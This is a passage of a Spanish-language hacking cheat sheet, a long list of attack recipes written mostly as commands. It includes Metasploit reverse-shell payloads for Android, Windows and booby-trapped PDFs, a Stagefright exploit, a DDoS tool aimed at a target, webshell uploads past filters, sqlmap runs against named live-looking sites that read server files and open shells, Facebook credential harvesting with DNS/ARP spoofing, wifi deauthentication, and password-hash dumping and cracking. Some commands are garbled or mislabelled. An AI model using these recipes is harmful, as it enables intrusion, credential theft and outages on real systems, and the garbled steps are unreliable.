1110msf> set PAYLOAD android/meterpreter/reverse_tcp
1111msf> set LHOST=192.168.1.10
1112msf> set LPORT=4444
1113msf> exploit
1114
1115
1116—————
1117————————
1118
1119msfvenom -p android/meterpreter/reverse_tcp LHOST= {YOUR IP} LPORT=4444 R > /root/whatever.apk
1120
1121msfconsole
1122use exploit/multi/handler
1123set payload android/meterpreter/reverse_tcp
1124set lhost {your Ip}
1125set lport 4444
1126exploit
1127
1128
1129
1130**********************************************************************
1131**********************************************************************
1132***** HACKEAR ANDROID STAGEFREIGHT
1133**********************************************************************
1134**********************************************************************
1135
1136Tendremos que descargarnos el exploit
1137
1138Link: https://www.exploit-db.com/exploits/38124/
1139
1140Una vez descargado, tendremos problemas con la codificación… con las comillas simples y dobles, es fácil de solucionar.
1141
1142Generamos el mp4 malicioso, para explotar la vulnerabilidad.
1143
1144# python mp4.py -c 192.168.1.15 -p 4444
1145
1146Esto nos devolverá un fichero, con nombre por defecto cve-2015-1538-1.mp4
1147
1148Ponemos en nuestro máquina el netcat a escuchar el puerto 4444
1149
1150# netcat -l -p 4444
1151
1152
1153Luego podemos crear una página
1154
1155indexpage = '''
1156<!DOCTYPE html>
1157<html>
1158<head>
1159<title>Stagefrightened!</title>
1160</head>
1161<body>
1162<script>
1163window.setTimeout('location.reload(true);', 4000);
1164</script>
1165<iframe src='/exploit.mp4'></iframe>
1166</body>
1167</html>
1168'''
1169
1170
1171**********************************************************************
1172**********************************************************************
1173***** ENCRIPTAR FICHEROS
1174**********************************************************************
1175**********************************************************************
1176
1177openssl aes-128-cbc -in archivo.txt -out cifrado.enc
1178
1179aes-128-cbc serÃa el protocolo utilizado mediante modo cbc (podemos utilizar otros tipos de cifrado mencionados en la ayuda del programa, como puede ser aes-256-cbc)
1180
1181-in: señala el archivo a cifrar (archivo.txt)
1182
1183-out: marcarÃa la salidad del archivo cifrado (cifrado.enc)
1184
1185A continuación ponemos una contraseña robusta, la verificamos y ya tenemos nuestro archivo cifrado
1186
1187**********************************************************************
1188**********************************************************************
1189***** DESENCRIPTAR FICHEROS
1190**********************************************************************
1191**********************************************************************
1192
1193openssl aes-128-cbc -d -in cifrado.enc -out descifrado
1194
1195donde:
1196
1197aes-128-cbc es el tipo de cifrado
1198
1199el parámetro -d indica que vamos a descifrar
1200
1201-in: nos marca el archivo cifrado (cifrado.enc)
1202
1203-out: indica el nombre del archivo ya descifrado (descifrado o cualquier otro que elijáis)
1204
1205y al igual que hicimos cuando ciframos, introducimos la contraseña.
1206
1207
1208**********************************************************************
1209**********************************************************************
1210***** INSTALAR PRIVOXY
1211**********************************************************************
1212**********************************************************************
1213
1214nano /etc/privoxy/config
1215
1216#Find the line that says “forward-socks5†and change it to look like this:
1217
1218forward-socks5 / 127.0.0.1:9050 .
1219
1220**********************************************************************
1221**********************************************************************
1222***** UFONET DDOS
1223**********************************************************************
1224**********************************************************************
1225Descargamos ufonet
1226
1227# git clone https://github.com/epsylon/ufonet.git
1228
1229Descargar lista de equipos zombies de la comunidad.
1230
1231# ./ufonet --download-zombies --proxy="http://127.0.0.1:9150"
1232
1233Abrir interfaz gráfica http
1234
1235# ./ufonet --gui
1236
1237Para atacar, solo nos queda
1238
1239# ./ufonet -i http://target.com
1240
1241
1242
1243**********************************************************************
1244**********************************************************************
1245***** BYPASS UPLOAD
1246**********************************************************************
1247**********************************************************************
1248Lo primero que debemos hacer es descargar una shell, por ejemplo de www.r57shell.net, por ejemplo c99.
1249
1250Después, cambiamos la extensión de la shell, de php a jpg.
1251
1252Luego ejecutaremos BurpSuite, para crear un proxy
1253
1254# burpsuite
1255
1256Ahora ejecutamos firefox.
1257
1258# firefox
1259
1260Preferences / Network / Settings: Manual Proxy configuration
1261
1262HTTP Proxy: localhost Port: 8080
1263
1264Una vez hecho esto, procedemos a subir la imagen a través del campo upload, deberemos estar atentos al BurpSuite, para interceptar la conexión, cambiar la extensión de jpg a php y reenviar el paquete.
1265
1266Luego dispondrás de una shell y podrás actuar por el servidor a tus anchas.
1267
1268
1269
1270**********************************************************************
1271**********************************************************************
1272***** OWASP ZAP
1273**********************************************************************
1274**********************************************************************
1275
1276Lo idoneo serÃa conectar a través de un router onion pi.
1277
1278ejecutar el comando
1279
1280#iceweasel -P
1281
1282Verificar en https://check.torproject.com
1283
1284Ahora ejecutamos firefox.
1285
1286Preferences / Network / Settings: Manual Proxy configuration
1287
1288HTTP Proxy: localhost Port: 8080
1289√ use this proxy server for all protocols
1290
1291Ahora en OWASP ZAP nos vamos a Options
1292
1293- Dinamyc SSL Certificates: Save/OK
1294
1295Volvemos a las preferencias de firefox, pero esta vez a certificados, para importar el certificado creado con "owasp zap"
1296
1297Preferences / Certificates
1298- View certificates
1299-- Import
1300--- Trust this CA to identify websites.
1301
1302De esta manera, filtrará todas las peticiones http, las más interesantes suelen ser post y get.
1303
1304Podemos usar "resend" para enviar una petición y modificarla a nuestro gusto para ver si es inyectable con sqlmap.
1305
1306Es importante usar la cookie que tenemos en owasp zap en conjunto con sqlmap.
1307
1308**********************************************************************
1309**********************************************************************
1310***** INYECCIÓN SQL CON SQLMAP
1311**********************************************************************
1312**********************************************************************
1313
1314username: ' OR 1=1; /*
1315pass: */--
1316
1317
1318Para buscar versión de la base de datos
1319# sqlmap -u url
1320
1321Para buscar nombre de la base de datos
1322# sqlmap -u url --dbs
1323
1324Para buscar el nombre de las tablas de la base de datos
1325# ./sqlmap -u url --tables -D database-name
1326
1327Para buscar columnas de la base de datos
1328# sqlmap -u url --column -T table-name -D database-name
1329
1330Para ver la información de la base de datos
1331# sqlmap -u url --dump --column -T table-name -D database-name
1332
1333grab cookie desde tamperdata (plugin de firefox)
1334firefox plugin
1335
1336# sqlmap -u 'http://IP-Address/?id=1&Submit=Submit#' --cookie='PHPSESSID=a93ts3jmfs2ar5asvhh69k6un1; security=low' --string="Surname" --dbs
1337# sqlmap -u "http://sitio.com/search.php" --data="buscar=prueba&submit=Buscar" --level=5 --risk=3 --dbs
1338
1339buscar=prueba&submit=Buscar : Este valor lo obtenemos de tamper data (plugin firefox)
1340
1341
1342Conectar sqlmap con tor
1343# ./sqlmap.py -u "http://www.velfi.ru/product.php?id=184" --tor --tor-type=SOCKS5 --tor-port 9150 --check-tor
1344
1345Nombre de usuario
1346./sqlmap.py -u http://www.paginadeprueba.com/noticia.php?id=10 –current-user
1347
1348Saber si el usuario es el administrador
1349./sqlmap.py -u http://www.paginadeprueba.com/noticia.php?id=10 --is-dba –current-db
1350
1351Adquirir privilegios con el usuario
1352./sqlmap.py -u http://www.paginadeprueba.com/noticia.php?id= --privileges
1353
1354Leer ficheros del servidor
1355./sqlmap.py -u http://www.paginadeprueba.com/noticia.php?id=10 –file-read=/etc/passwd
1356
1357./sqlmap.py -u http://www.paginadeprueba.com/noticia.php?id=10 --file-read=ruta_raiz_del_servidor/index.php
1358
1359./sqlmap.py -u http://www.paginadeprueba.com/noticia.php?id=10 --file-read=ruta_raiz_del_servidor/conn.php
1360
1361Leyendo Ruta/local_db.inc
1362./sqlmap.py -u http://www.paginadeprueba.com/noticia.php?id=10 –file-read=ruta_raiz_del_servidor/local_db.icn
1363
1364Conseguir una shell
1365./sqlmap.py -u http://www.paginadeprueba.com/noticia.php?id=10 --sql-shell
1366
1367./sqlmap.py -u http://www.paginadeprueba.com/noticia.php?id=10 --os-shell
1368
1369Crear fichero con la ruta especificada con el siguiente código
1370<?php
1371if (isset($_REQUEST["upload"])){$dir=$_REQUEST["uploadDir"];
1372if (phpversion()<'4.1.0'){$file=$HTTP_POST_FILES["file"]["name"];@move_uploaded_file($HTTP_POST_FILES["file"]["tmp_name"],$dir."/".$file) or die();
1373}else{
1374$file=$_FILES["file"]["name"];
1375@move_uploaded_file($_FILES["file"]["tmp_name"],$dir."/".$file) or die();
1376}
1377@chmod($dir."/".$file,0755);echo "File uploaded";
1378}else {
1379echo "<form action=".$_SERVER["PHP_SELF"]." method=POST enctype=multipart/form-data><input type=hidden name=MAX_FILE_SIZE value=1000000000><b>sqlmap file uploader</b><br><input name=file type=file><br>to directory: <input type=text name=uploadDir value=Ruta_Raiz_del_servidor/prueba> <input type=submit name=upload value=upload></form>";
1380}
1381?>
1382
1383Enumerar las tablas de la base de datos
1384./sqlmap.py -u "http://disneyland.com/vbs/pventa/pventa.asp?tp=1&idtipo=&provincia=3" --batch --tables
1385
1386hacer un dump de una tabla especÃfica.
1387./sqlmap.py -u "http://disneyland.com/vbs/pventa/pventa.asp?tp=1&idtipo=&provincia=3" --batch --dump -T clientes
1388
1389En caso de que la inyección se realice a través de un formulario.
1390./sqlmap.py -u "http://disneyland.com/formulario.php" --data "id=94&idcal=50"
1391
1392Si necesitamos una sessión abierta, para ello necesitaremos la cookie, para ello podemos usar una herramienta como owasp zap, para obtener la cookie
1393
1394./sqlmap.py -u "http://disneyland.com/formulario.php" --data "id=94&idcal=50" --cookie "lacookieencuestión" -p id
1395
1396
1397
1398
1399**********************************************************************
1400***** HACKING WORDPRESS CON WPSCAN
1401**********************************************************************
1402**********************************************************************
1403
1404Hace un escaneo general, mostrando las posibles vulnerabilidades e información del sistema.
1405
1406# wpscan --url http://192.168.217.1/wordpress/
1407
1408
1409Enumeramos los plugins que tiene por si existe alguno vulnerable
1410
1411# wpscan -—url http://192.168.217.1/wordpress/ —enumerate p
1412
1413Buscamos los usuarios de wordpress, para hacer luego fuerza bruta
1414
1415# wpscan -—url http://192.168.217.1/wordpress/ —enumerate u
1416
1417Ataca por fuerza bruta, para ello debemos saber el usuario.
1418
1419# wpscan --url http://192.168.217.1/wordpress/ --wordlist /root/diccionario.txt --username admin
1420
1421Usamos Tor como proxy, primero debemos tenerlo activado.
1422
1423# wpscan --url example.org --proxy socks5://127.0.0.1:9050
1424
1425
1426**********************************************************************
1427**********************************************************************
1428***** HACKEAR XAMMP
1429**********************************************************************
1430**********************************************************************
1431
1432nmap -sS -T4 -A 192.168.1.38
1433use exploit/windows/http/xampp_webdav_upload_php
1434set payload php/meterpreter/reverse_tcp
1435set Lhost 192.168.1.36 (Nuestra IP)
1436set RHOST 192.168.1.38 (IP Victima)
1437exploit
1438
1439
1440**********************************************************************
1441**********************************************************************
1442***** HACKEAR WINDOWS REMOTO
1443**********************************************************************
1444**********************************************************************
1445
1446service postgresql start
1447service metasploit start
1448nmap -T4 -A -v 192.168.1.1/24
1449msf> search netapi
1450msf> use exploit/windows/smb/ms08_067_netapi
1451msf> set payload windows/meterpreter/reverse_tcp
1452msf> show options
1453SET RHOST 192.168.1.11 (ATACANTE)
1454SET LHOST 192.168.1.50 (VICTIMA)
1455SET LPORT 4444
1456
1457
1458
1459**********************************************************************
1460**********************************************************************
1461***** HACKEAR WINDOWS REMOTO
1462**********************************************************************
1463**********************************************************************
1464nmap -sS -O ip
1465show exploits
1466use windows/smb/ms08_067_netapi
1467set RHOST ip-victima
1468set RPORT 445
1469set SMBPIPE SRVSVC
1470set TARGET 0
1471set PAYLOAD windows/meterpreter/bind_tcp
1472exploit
1473shell
1474
1475
1476**********************************************************************
1477**********************************************************************
1478***** HACKEAR WINDOWS REMOTO
1479**********************************************************************
1480**********************************************************************
1481use exploit/windows/dcerpc/ms03_026_dcom
1482set payload windows/meterpreter/reverse_tcp
1483set RHOST 192.168.1.11 (ATACANTE)
1484set LHOST 192.168.1.50 (VICTIMA)
1485set RPORT 135
1486show targets
1487exploit
1488
1489**********************************************************************
1490**********************************************************************
1491***** HACKEAR SSH REMOTO
1492**********************************************************************
1493**********************************************************************
1494https://www.offensive-security.com/metasploit-unleashed/scanner-ssh-auxiliary-modules/
1495msf> search ssh_version
1496msf> use auxiliary/scanner/ssh/ssh_version
1497clear
1498info
1499set RHOSTS 192.168.10.1/24
1500set threads 100
1501run
1502search ssh 2.0
1503set RHOSTS IP-VICTIMA
1504set RHOSTS IP-VICTIMA/24
1505run
1506
1507
1508----
1509
1510msf> search ssh login
1511msf> use auxiliary/scanner/ssh/ssh_version
1512msf> show options
1513msf> set RHOST ip-victima
1514msf> set STOP_ON_SUCCESS true
1515msf> set THREADS 100
1516msf> set username root
1517msf> set PASSWORD /ruta/password.txt
1518msf> exploit
1519
1520**********************************************************************
1521**********************************************************************
1522***** IPTABLES
1523**********************************************************************
1524**********************************************************************
1525
1526# IPTABLES -P INPUT DROP
1527# IPTABLES -P OUTPUT DROP
1528# IPTABLES -P FORWARD DROP
1529
1530
1531Asegurar que la IP no se muestra al objetivo añadiendo una regla en el firewall
1532
1533root@kali:/# iptables -A OUTPUT --dest -j DROP
1534
1535**********************************************************************
1536**********************************************************************
1537***** PAYLOAD PDF
1538**********************************************************************
1539**********************************************************************
1540
1541msf> search embed pdf
1542use exploit/windows/fileformat/adobe_pdf_embedded_exe
1543info
1544show payloads
1545set PAYLOAD windows/meterpreter/reverse_tcp
1546set LHOST MI-IP (REMOTA???)
1547set LPORT 4444
1548set FILENAME nombre.pdf
1549set INFILENAME /ruta/fichero_pdf_a_infactar.pdf
1550exploit
1551
1552
1553msf> search multi handler
1554use exploit/multi/handler
1555show options
1556set PAYLOAD windows/meterpreter/reverse_tcp
1557set LPORT 4444
1558exploit
1559
1560
1561
1562**********************************************************************
1563**********************************************************************
1564***** ATAQUE DDOS ANDROID
1565**********************************************************************
1566**********************************************************************
1567
1568https://github.com/v4char/BT-Device-DOS
1569
1570Bluetooth DOS
1571Reinicia algunos dispositivos android, aun en fase muy muy temprana
1572
1573uso: python blue_crash.py mac_del_dispositivo hilos(recomendado 30)
1574
1575
1576
1577**********************************************************************
1578**********************************************************************
1579***** HACKEAR DISPOSITIVO BLUETOOTH
1580**********************************************************************
1581**********************************************************************
1582
1583
1584Primero activamos el bluetooth
1585
1586# service bluetooth start
1587
1588Activamos el dispositivo bluetooth
1589
1590# hciconfig hci0 up
1591
1592Comprobamos que funciona corréctamente
1593
1594# hciconfig hci0
1595
1596Ahora buscaremos los dispositivos bluetooth que tenemos a nuestro alcance, para ello usaremos btscanner, aunque existen muchos otros escanners.
1597
1598# btscanner
1599
1600A continuación, seleccione "I" para iniciar una exploración de consulta.
1601
1602Ahora vamos a suplantar la ideantidad de un dispositivo bluetooth
1603
1604# spooftooph -i hci0 -a A0:02:DC:11:4F:85 -n Car537
1605
1606-i designa el dispositivo, en este caso hci0
1607-a designa la dirección MAC queremos suplantar
1608-n designa el nombre del dispositivo que queremos suplantar, en este caso "Car537"
1609
1610Si lo hacemos bien, nuestro dispositivo Bluetooth suplantar la dirección MAC y el nombre del dispositivo
1611
1612Si queremos comprobarlo, debemos ejecutar lo siguiente
1613
1614# hciconfig hci0 name
1615
1616
1617
1618**********************************************************************
1619**********************************************************************
1620***** GENERAR WEBSHELL
1621**********************************************************************
1622**********************************************************************
1623Subes el fichero a través de un form upload y luego accedes a el. Si tiene filtros para extensiones, podemos cambiarlas al vuelo Live HTTP o TAMPER DATE
1624weevely generate mypassword /root/Desktop/myfile.php
1625
1626Para buscar webshells en nuestro equipo, podemos usar el siguiente comando, aunque arrojará muchos falsos positivos.
1627$ grep -RPn "(system|phpinfo|pcntl_exec|python_eval|base64_decode|gzip|mkdir|fopen|fclose|readfile|passthru)" /var/www/
1628
1629
1630#!/usr/bin/perl
1631
1632my @fichero0;
1633open (file,"<@ARGV[0]");
1634while (<file>) {push (@fichero0,$_);}
1635close (file);
1636
1637my @fichero1;
1638foreach (@fichero0)
1639{#por cada linea leida
1640 $_ =~ s/; /;\n/g;
1641 $_ =~ s/ {/\n{\n\t/g;
1642 $_ =~ s/} /}\n/g;
1643 push (@fichero1,$_);
1644}
1645
1646open (out, ">out.php");
1647print out $_ foreach (@fichero1);
1648close (out);
1649
1650
1651
1652
1653**********************************************************************
1654**********************************************************************
1655***** HACKEAR HOTSPOT WIFI
1656**********************************************************************
1657**********************************************************************
1658
1659Antes que nada, el hotspot no debe estár cifrado por ninguna clave WPA/WPA2. Usamos ifconfig, peor macchanger también podrÃa valer
1660
1661ifconfig en1 | grep ether
1662arp -a
1663sudo ifconfig en1 ether [mac address to spoof]
1664
1665Si queremos saber su ip
1666fping -c1 -g 192.168.1.0/24
1667arp -n
1668arp -n | grep <direccion_MAC>
1669
1670
1671
1672**********************************************************************
1673**********************************************************************
1674***** INSTALAR SNORT: DETECTOR DE INTRUSOS
1675**********************************************************************
1676**********************************************************************
1677
1678# apt-get install snort
1679# dpkg-reconfigure snort
1680# leafpad /etc/snort/snort.conf
1681
1682Añadir al final del fichero
1683include /etc/snort/rules/icmp.rules
1684
1685# leafpad /etc/snort/rules/icmp.rules
1686
1687Añadir regla:
1688alert icmp any any -> any any (msg:"ICMP Packet"; sid:477; rev:3;)
1689
1690<Rule Actions> <Protocol> <Source IP Address> <Source Port> <Direction Operator> <Destination IP Address> <Destination > (rule options)
1691
1692# snort -c /etc/snort/snort.conf -l /var/log/snort/
1693# snort -dev -i eth0 -c /etc/snort/snort.conf -l /var/log/snort/
1694
1695Full: El modo de Alerta Completa nos devolverá información sobre: tiempo, mensaje de la alerta, clasificación, prioridad de la alerta, IP y puerto de origen/destino e información completa de las cabeceras de los paquetes registrados. Formato ASCII.
1696
1697# snort -A full -dev -l /var/log/snort/ -h 192.168.1.0/24 -c /etc/snort/snort.conf
1698
1699Fast: El modo Alerta Rápida nos devolverá información sobre: tiempo, mensaje de la alerta, clasificación, prioridad de la alerta, IP y puerto de origen y destino. Formato ASCII.
1700
1701# snort -A fast -dev -l /var/log/snort/ -h 192.168.1.0/24 -c /etc/snort/snort.conf
1702
1703Ahora si queremos ver los logs
1704
1705# tail -F /var/log/snort/alert
1706
1707Para ejecutar como demonio
1708
1709# snort -D -c /etc/snort/snort.conf -l /var/log/snort/
1710
1711Las reglas por defecto las puedes descargar desde aquà https://www.snort.org/downloads/#rule-downloads
1712
1713
1714**********************************************************************
1715**********************************************************************
1716***** GENERAR DICCIONARIO BASADO EN WEBSITE: CELW
1717**********************************************************************
1718**********************************************************************
1719
1720# cewl -w customwordlist.txt -d 5 -m 7 www.sans.org
1721
1722-w customwordlist.ext: los medios -w Escribir el nombre del archivo que sigue.
1723-d 5: la profundidad (en este caso, 5) que CEWL se arrastrará a la página web.
1724-m 7: la longitud mÃnima de la palabra; en este caso se agarra palabras de 7 caracteres mÃnimo.
1725www.sans.org: la página web que rastreamos.
1726
1727
1728**********************************************************************
1729**********************************************************************
1730***** GENERAR DICCIONARIO CON CRUNCH
1731**********************************************************************
1732**********************************************************************
1733
1734# crunch <min> max<max> <characterset> -t <pattern> -o <output filename>
1735
1736Ahora, vamos a repasar lo que está incluido en la sintaxis anterior.
1737
1738min = La longitud mÃnima de la contraseña.
1739max = La longitud máxima de la contraseña.
1740characterset = El conjunto de caracteres que se utilizará en la generación de las contraseñas.
1741-t <patterm> = El patrón especÃfico de las contraseñas generadas. Por ejemplo, si usted sabÃa que el cumpleaños de la diana era 0728 (28 de julio) y se sospecha que utilizan su cumpleaños en su contraseña (la gente a menudo lo hacen), se podrÃa generar una lista de contraseñas que terminó con 0728 dando crujir el patrón @@@ @@@@ 0728. Esta palabra generar contraseñas de hasta 11 caracteres (7 variables y fijos) 4 largos que todo terminó con 0728.
1742-o <outputfile> = Este es el archivo que desea que su lista de palabras escribir en él.
1743
1744Para ver los chartset disponibles podemos hacer un
1745
1746# cat /usr/share/rainbowcrack/charset.txt
1747
1748# crunch 8 8 -f /usr/share/rainbowcrack/charset.txt mixalpha -o /root/alphawordlist.lst
1749
1750# crunch 0 25 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 -o diccionario.txt
1751
1752Si supiéramos que el cumpleaños de la vÃctima es el 28 de julio y que probablemente utilizó esa fecha (la gente suele utilizar sus fechas de nacimiento de sus contraseñas para que sea más fácil de recordar) al final de una contraseña de diez caracteres? PodrÃamos generar todas las posibilidades de contraseñas de diez caracteres que terminan en 0728 y enviar el resultado a un archivo en el directorio llamado wordlist.lst cumpleaños de usuario root, escribiendo:
1753
1754# crunch 10 10 -t @@@@@@0728 -o /root/birthdaywordlist.lst
1755
1756Con caracteres especiales
1757
1758#crunch 5 5 pentestlab\%\@\!
1759
1760
1761
1762
1763**********************************************************************
1764**********************************************************************
1765***** DNS SPOOFING
1766**********************************************************************
1767**********************************************************************
1768
1769Lo primero que debemos hacer es clonar el sitio web que queremos "falsificar", por ejemplo www.facebook.com, para ello usaremos setoolkit
1770
1771# setoolkit
1772Elegimos la opción (1) Social-Engineering Attacks
1773Elegimos la opción (2) Website attack vectors
1774Elegimos la opción (3) Credential harvester attack method
1775Elegimos la opción (2) Site cloner
1776Nos pide que añadamos nuestra IP, para saberla ifconfig.
1777Nos pide que añadamos la url a clonar, en este caso www.facebook.com
1778
1779
1780Ahora limpiamos el chache del DNS
1781
1782# ipconfig /flushdns
1783
1784Ahora debemos poner en modo promiscuo nuestra tarjeta de red
1785
1786# ifconfig eth0 promisc
1787
1788Obligamos a la vÃctima a desconectarse de la web
1789
1790# tcpkill -9 host [www.facebook.com]
1791
1792Editamos el fichero cd /usr/local/hosts y añadimos 192.168.1.101 www.facebook.com
1793
1794# nano /usr/local/hosts
1795192.168.1.101 www.facebook.com
1796
1797Salimos del modo promiscuo
1798
1799# ifconfig eth0 -promisc
1800
1801Copiamos nuestra "web clonada" a /var/www/ (Ruta por defecto apache)
1802
1803Arrancamos apache
1804
1805# service apache2 start
1806
1807Applications -> Kali Linux -> Sniffing -> Network Sniffers, and finally, dnsspoof
1808
1809# dnsspoof -f hosts
1810
1811
1812**********************************************************************
1813**********************************************************************
1814***** DNS SPOOFING
1815**********************************************************************
1816**********************************************************************
1817
1818Lo primero es habilitar ip forwarding
1819
1820# echo 1 > /proc/sys/net/ipv4/ip_forward
1821
1822Ahora necesitamos actualizar la tabla arp del router
1823
1824# aprspoof -i eth0 -t 192.168.1.154 192.168.1.106
1825
1826Ahora ahoremos lo mismo, pero con la vÃctima
1827
1828# aprspoof -i eth0 -t 192.168.1.106 192.168.1.154
1829
1830# dsniff -i eth0
1831
1832Ahora mataremos todas las conexiones con el puerto 22 y la máquina
1833
1834# tcpkill -i eth0 dst 192.168.1.92 and dst port 22
1835
1836-i: Interface (eth0)
1837dst: host de destino
1838dst port: puerto de destino
1839
1840Se empieza a escuchar y cuando detecta una conexión a ese puerto y la dirección IP, la cerrará
1841
1842
1843**********************************************************************
1844**********************************************************************
1845***** ATAQUE DDOS WIRELESS
1846**********************************************************************
1847**********************************************************************
1848
1849Ponemos la tarjeta en modo monitor
1850
1851# airmon-ng start wlan0
1852
1853Revisamos el canal del Punto de acceso y ponemos en modo monitor en ese canal en especÃfico:
1854
1855# airmon-ng -c 5 mon0
1856
18571.- DoS al punto de acceso:
1858 Con aireplay enviamos paquetes de deautenticación en un buncle infinito (-0 0) al Punto de acceso.
1859
1860# aireplay-ng -0 0 -a 99:99:99:99:99:99 mon0
1861
1862Donde 99:99:99:99:99:99 es la mac del Punto de acceso.
1863
1864 2.- DoS al Cliente:
1865 Con aireplay enviamos paquetes de deautenticación en un buncle infinito (-0 0) a un cliente en especÃfico.
1866
1867# aireplay-ng -0 0 -a 99:99:99:99:99:99 -c 11:11:11:11:11:11 mon0
1868
1869
1870Donde 99:99:99:99:99:99 es la mac del Punto de acceso y 11:11:11:11:11:11 es la mac del Cliente.
1871
1872
1873
1874**********************************************************************
1875**********************************************************************
1876***** CAMBIAR MAC AL INICIAR
1877**********************************************************************
1878**********************************************************************
1879
1880Cambiaremos nuestra dirección MAC al iniciar para que no se nos olvide.
1881
1882# nano /etc/network/if-pre-up.d/changemac
1883
1884Añadir lo siguiente.
1885
1886#! /bin/bash
1887macchanger -r wlan0
1888
1889
1890# chmod +x /etc/network/if-pre-up.d/changemac
1891
1892
1893
1894
1895
1896**********************************************************************
1897**********************************************************************
1898***** PENTESTING SQL SERVER CON NMAP Y METASPLOIT
1899**********************************************************************
1900**********************************************************************
1901
1902La mayorÃa de las bases de datos SQL se ejecutan en el puerto 1433 por lo que con el fin de descubrir información con respecto a la base de datos que necesitamos para ejecutar la siguiente secuencia de comandos:
1903
1904Obtener versión de la base de datos e informacion: instancia name
1905
1906# nmap -p1433 --script ms-sql-info 192.168.1.122
1907
1908Ahora que tenemos la versión y la instancia name, comprobamos por fuerza bruta tiene tiene una password debil.
1909
1910# nmap -p1433 --script ms-sql-brute 192.168.1.122
1911
1912También podemos hacerlo con nuestros propios diccionarios de usuarios y passwords.
1913
1914# nmap -p1433 –script ms-sql-brute –script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt
1915
1916
1917
1918-----
1919-----
1920-----
1921
1922
1923# nmap -sU -p 1434 -sV 192.168.1.122
1924
1925Ahora abrimos metasploit
1926
1927# service postgresql start
1928
1929# service msfconsole start
1930
1931msf> use auxiliary/scanner/mssql/mssql_ping
1932msf> set RHOTS 192.168.1.122
1933
1934otro módulo de metasploit que podrÃa ayudar
1935
1936msf> auxiliary/scanner/mssql/mssql_login
1937msf> auxiliary/scanner/mssql/mssql_enum
1938msf> set CMD 'ipconfig'
1939msf> run
1940
1941
1942**********************************************************************
1943**********************************************************************
1944***** EXTRAYENDO METADATOS CON EXIFTOOL
1945**********************************************************************
1946**********************************************************************
1947
1948
1949# apt-get install exiftool
1950
1951# exiftool /roo/arhivo.doc
1952
1953
1954
1955**********************************************************************
1956**********************************************************************
1957***** POST EXPLOTACION CON METASPLOIT EN LINUX
1958**********************************************************************
1959**********************************************************************
1960
1961Vamos a suponer que ya hemos explotado el sistema, ahora vamos a poner la sesión en segundo plano (background) con Ctrl + Z.
1962
1963Ahora si queremos ver la sessiones activas basta con poner.
1964
1965msf> sessions
1966
1967Ahora usaremos el modulo hasdump, que tratará de obtener los hashes de contraseñas de la system. El único parámetro que nos pide es session.
1968
1969msf> use post/linux/gather/hasdump
1970msf> show OPTIONS
1971msf> set SESSION 1
1972msf> exploit
1973
1974Este otro ḿodulo nos permite checkear si es una máquina virtual o no.
1975
1976msf> use post/linux/gather/checkvm
1977msf> show OPTIONS
1978msf> set SESSION 1
1979msf> exploit
1980
1981Otro módulo posterior explotación muy interesante de Metasploit es enum_configs los que se va a obtener todos los archivos de configuración importantes
1982
1983msf> use post/linux/gather/enum_configs
1984msf> show OPTIONS
1985msf> set SESSION 1
1986msf> exploit
1987
1988Ahora bien, si queremos comprobar estos archivos .txt podemos abrir otra consola y podemos escribir, por ejemplo,
1989
1990# nano /root/.msf4/loot/20130104144725_default_172.16.212.133_linux.enum.conf_373751.txt
1991
1992
1993También podemos enumerar las configuraciones de red con el módulo enum_network.
1994
1995msf> use post/linux/gather/enum_network
1996msf> show OPTIONS
1997msf> set SESSION 1
1998msf> exploit
1999
2000
2001Si queremos descubrir qué tipo de instalaciones existe en el sistema remoto como IDS, antivirus, cortafuegos, etc. entonces podemos utilizar el siguiente módulo
2002
2003msf> use post/linux/gather/enum_protections
2004msf> show OPTIONS
2005msf> set SESSION 1
2006msf> exploit
2007
2008También podemos enumerar todo el sistema mediante la obtención de información con respecto a las cuentas de usuario, los paquetes instalados, los servicios, el disco duro, la versión para Linux, etc.
2009
2010msf> use post/linux/gather/enum_system
2011msf> show OPTIONS
2012msf> set SESSION 1
2013msf> exploit
2014
2015Información Historia recopilación de usuario
2016
2017msf> use post/linux/gather/enum_users_history
2018msf> show OPTIONS
2019msf> set SESSION 1
2020msf> exploit
2021
2022
2023
2024**********************************************************************
2025**********************************************************************
2026***** ATACANDO MYSQL CON METASPLOIT
2027**********************************************************************
2028**********************************************************************
2029
2030Abrimos metasploit
2031
2032# service postgresql start
2033# msfconsole
2034
2035Para obtener la versión del MYSQL ejecutamos el siguiente módulo metasploit
2036
2037msf> use auxiliary/scanner/mysql/mysql_version
2038msf> info
2039msf> set RHOSTS 192.168.1.122
2040msf> run
2041
2042Obtener el login por fuerza bruta con diccionarios.
2043
2044msf> use auxiliary/scanner/mysql/mysql_login
2045msf> set RHOSTS 192.168.1.122
2046msf> set USER_FILE /root/usernames.lst
2047msf> set PASS_FILE /root/passwords.lst
2048msf> run
2049
2050Ahora utilizaremos otro módulo metasploit, para ver la enumeración de las cuentas MySQL
2051
2052msf> use auxiliary/admin/mysql/mysql_enum
2053msf> set RHOSTS 192.168.1.122
2054msf> set USERNAME root
2055msf> run
2056
2057Siguiente es el momento de configurar y ejecutar el módulo mysql_hashdump con el fin de volcar los hashes de las contraseñas de todas las cuentas de base de datos
2058
2059Esto guardará en nuestro disco las passwords.
2060
2061msf> use auxiliary/admin/mysql/mysql_hashdump
2062msf> set RHOSTS 192.168.1.122
2063msf> run
2064
2065
2066Ahora con cualquier cliente mysql, podemos acceder.
2067
2068# mysql -h IP -u username -p password
2069
2070mysql> show databases
2071mysql> use mysql
2072mysql> select User, Password from users;
2073mysql> show tables from owasp10
2074mysql> use owasp10
2075
2076
2077
2078**********************************************************************
2079**********************************************************************
2080***** DUMPING Y CRACKEO DE PASSWORD UNIX
2081**********************************************************************
2082**********************************************************************
2083
2084Suponiendo que hemos explotado una vulnerabilidad y tenemos una shell remota.
2085
2086Obtener listado de las cuentas remotas
2087$ cat /etc/passwd
2088
2089Obtener las contraseñas hash y lo guardaremos en un archivo llamado shadow.txt
2090$ cat /etc/shadow
2091
2092
2093./unshadow /root/Desktop/Cracking/passwords.txt /root/Desktop/Cracking/shadow.txt > /root/Desktop/Cracking/cracked.txt
2094
2095./john /root/Desktop/Cracking/cracked.txt
2096
2097Si queremos ver las contraseñas
2098
2099./john –show /root/Desktop/Cracking/cracked.txt
2100
2101Ahora podrÃamos tomar el control remoto como root de la máquina.
2102
2103
2104
2105**********************************************************************
2106**********************************************************************
2107***** EXPLOTANDO RLOGIN UNIX
2108**********************************************************************
2109**********************************************************************
2110
2111La vulnerabilidad de rlogin corre en el puerto 513. Para explotarla basta con instalar un cliente
2112
